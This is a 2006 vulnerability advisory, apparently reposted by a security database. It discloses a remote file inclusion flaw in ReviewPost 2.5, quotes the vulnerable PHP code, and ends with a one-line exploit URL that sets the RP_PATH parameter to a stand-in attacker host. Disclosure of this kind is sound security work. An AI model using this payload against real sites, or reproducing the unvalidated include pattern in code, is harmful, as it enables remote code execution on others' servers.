SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion

2006-09-18T00:00:00
ID SECURITYVULNS:DOC:14305
Type securityvulns
Reporter Securityvulns
Modified 2006-09-18T00:00:00

Description

#######################Solpot Crew Community

ReviewPost 2.5 (RP_PATH) Remote File Inclusion

Donwload File : http://3-bius.com/ReviewPost.zip

Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)

contact: bius@mac.com

Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt

Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry

imam26_it,ant1casper(tolong tambahin ya)

#nyubi , #hitamputih @dalnet

and all member solpotcrew community

http://www.nyubicrew.org/forum/

especially thx to Solpot @ nyubi@dal.net

Input passed to the "RP_PATH" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from index.php

<?php require "pp-inc.php";

if ( is_numeric($argv[0]) ) { header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}"); exit; }

require "$RP_PATH/languages/$rplang/index.php"; require "$RP_PATH/login-inc.php";

if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) { diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." ); exit; }

?>

nb : others file has vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

#######################################################################
################################E.O.F##################################